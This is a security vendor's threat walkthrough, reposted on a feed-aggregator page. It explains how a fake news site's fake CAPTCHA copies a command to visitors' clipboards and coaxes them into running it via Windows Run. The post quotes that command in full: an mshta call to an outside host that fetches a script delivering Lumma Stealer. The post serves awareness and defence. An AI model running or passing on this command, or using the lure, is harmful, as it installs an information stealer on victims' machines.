惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

P
Proofpoint News Feed
博客园 - 聂微东
Application and Cybersecurity Blog
Application and Cybersecurity Blog
MyScale Blog
MyScale Blog
罗磊的独立博客
H
Help Net Security
L
LangChain Blog
T
Threat Research - Cisco Blogs
量子位
S
Securelist
Last Week in AI
Last Week in AI
L
Lohrmann on Cybersecurity
T
The Exploit Database - CXSecurity.com
P
Privacy International News Feed
The Hacker News
The Hacker News
Vercel News
Vercel News
D
Darknet – Hacking Tools, Hacker News & Cyber Security
C
Cybersecurity and Infrastructure Security Agency CISA
T
The Blog of Author Tim Ferriss
T
Threatpost
Security Latest
Security Latest
P
Palo Alto Networks Blog
Microsoft Security Blog
Microsoft Security Blog
NISL@THU
NISL@THU
F
Full Disclosure
WordPress大学
WordPress大学
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
C
Check Point Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
酷 壳 – CoolShell
酷 壳 – CoolShell
H
Heimdal Security Blog
J
Java Code Geeks
Recorded Future
Recorded Future
Hugging Face - Blog
Hugging Face - Blog
G
GRAHAM CLULEY
Know Your Adversary
Know Your Adversary
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
阮一峰的网络日志
阮一峰的网络日志
U
Unit 42
B
Blog RSS Feed
月光博客
月光博客
C
Cisco Blogs
V
Visual Studio Blog
D
DataBreaches.Net
H
Hacker News: Front Page
博客园 - 叶小钗
N
News and Events Feed by Topic
爱范儿
爱范儿
A
Arctic Wolf

Threat Walkthroughs – ThreatDown by Malwarebytes

Fake Booking.com emails target hotels Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials USB worms: Still wriggling on to under-protected computers after all these years Analyzing a Mispadu Trojan’s attack chain How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes Web shop spreads SocGolish malware and steals credit cards A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
Clipboard hijacker tries to install a Trojan
Pieter Arntz · 2025-01-01 · via Threat Walkthroughs – ThreatDown by Malwarebytes
Clipboard icon

Criminals are attempting to get users to install malware from the clipboard.

As patching and software quality improves over time, it gets harder and harder for criminals to run their malware automatically. This leaves them with two alternatives: Break into your computer and run it themselves (a tactic favored by ransomware gangs looking for a large return from a single attack) or find a way to get users to run it.

We recently observed an attack that uses clipboard hijacking for the latter: Fooling users into running malware.

The attack starts when visitors are lured to a website masquerading as a reputable news outlet, by a sensational news headline.

When they arrive at the website, they are shown a fake version of the familiar “I’m not a robot” CAPTCHA.

The fake news site shows a reCaptch challenge
A fake news site shows a fake CAPTCHA challenge

If they click inside the CAPTCHA look-a-like, they are presented with a prompt that asks them to:

  1. Press & hold the Windows Key + R
  2. In the verification window, press Ctrl + V
  3. Press Enter on your keyboard to finish
Instructions the attacker would like you to follow
The fake CAPTCHA’s “verification steps”

Behind the scenes, the website had added the following command to my clipboard:

mshta https://solve.jenj.org/awjxs.captcha?u=25330553-e0c1-4aea-99ed-f76df7024daa # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8370''

You wonder how this is possible when browsers like Chrome, Firefox, and Safari require explicit user permission before allowing a website to access or modify the clipboard. This is typically done through a prompt that the user must accept. In this case, the “permission was given” when the visitor clicked the CAPTCHA image.

The so-called “verification steps” open the Run command prompt (Windows key + R), paste the command from the clipboard into the prompt (Ctrl + V), and then run it (Enter).

The command executes a script at a URL using the MSHTA (Microsoft HTML Application Host) executable—another reminder that it should be restricted in your environment.

The command contains a commented section that is designed to fool the users into thinking they’re continuing the task of proving they aren’t a robot.

Looks legit, right?
The pasted command contains a CAPTCHA-related comment

The command runs a script that attempts to download Lumma Stealer, an information stealer sold as malware-as-a-service (MaaS). Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details.

The ThreatDown/Malwarebytes web protection module saved the day.

ThreatDown/Malwarebytes block the domain with the script
ThreatDown and Malwarebytes software blocks the domain

Generally speaking, if a website asks you to run a command, go elsewhere.